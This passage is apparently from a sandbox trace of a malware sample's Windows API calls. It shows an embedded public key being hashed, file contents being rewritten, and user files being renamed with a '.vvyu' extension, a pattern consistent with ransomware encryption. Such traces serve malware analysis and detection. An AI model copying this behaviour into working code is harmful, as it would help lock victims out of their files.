KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.829] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.830] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.830] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.830] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.830] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.830] GetLastError () returned 0x0 [0195.831] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.831] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.831] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.831] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.831] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9a50) returned 0x2ea79b0 [0195.832] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.833] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0195.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0195.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d38 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.835] GetCurrentThreadId () returned 0x66c [0195.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4ba0 [0195.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0195.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.836] GetCurrentThreadId () returned 0x66c [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0195.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0195.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0195.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.847] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x9a4a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x9a4a, lpOverlapped=0x0) returned 1 [0195.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.848] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9a4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.848] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0195.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0195.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.849] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0195.850] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.850] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.850] CloseHandle (hObject=0x568) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0195.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.852] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\6pW8RpGL-.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\6pw8rpgl-.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\6pW8RpGL-.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\6pw8rpgl-.flv.vvyu")) returned 1 [0195.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.854] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.856] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987f5530, ftCreationTime.dwHighDateTime=0x1d8a2bd, ftLastAccessTime.dwLowDateTime=0x45d6dab0, ftLastAccessTime.dwHighDateTime=0x1d8a58d, ftLastWriteTime.dwLowDateTime=0x45d6dab0, ftLastWriteTime.dwHighDateTime=0x1d8a58d, nFileSizeHigh=0x0, nFileSizeLow=0xcad9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tkVyxwxrQ.ots", cAlternateFileName="TKVYXW~1.OTS")) returned 1 [0195.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0195.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.857] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\tkVyxwxrQ.ots") returned=".ots" [0195.857] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\tkVyxwxrQ.ots" (normalized: 